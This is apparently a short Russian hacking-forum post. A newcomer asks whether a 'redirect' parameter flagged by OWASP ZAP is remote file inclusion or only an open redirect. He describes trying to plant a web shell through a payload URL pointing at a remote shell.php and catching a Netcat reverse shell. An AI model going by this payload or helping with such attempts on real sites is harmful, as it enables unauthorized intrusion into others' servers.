Показать сообщение отдельно

  #1  
Старый 19.07.2022, 00:40
gilo20
Новичок
Регистрация: 18.07.2022
Сообщений: 2
С нами: 2014186

Репутация: 0
По умолчанию

Нашел уязвимость c помощью owasp zap, выдало как RFI, но не уверен, что это так.
Параметр страницы:
currency_code=&redirect=http%3A%2F%2Fwww.google.co m%2F, и редиректит на страницу гугл.

Пытался залить шелл:
currency_code=&redirect=http://ip/shell.php, файл скачивает, но с помощью Netcat обратную оболочку не дает.
С чем это связано, и есть ли тут вообще RFI или только OPEN REDIRECT?
 
Ответить с цитированием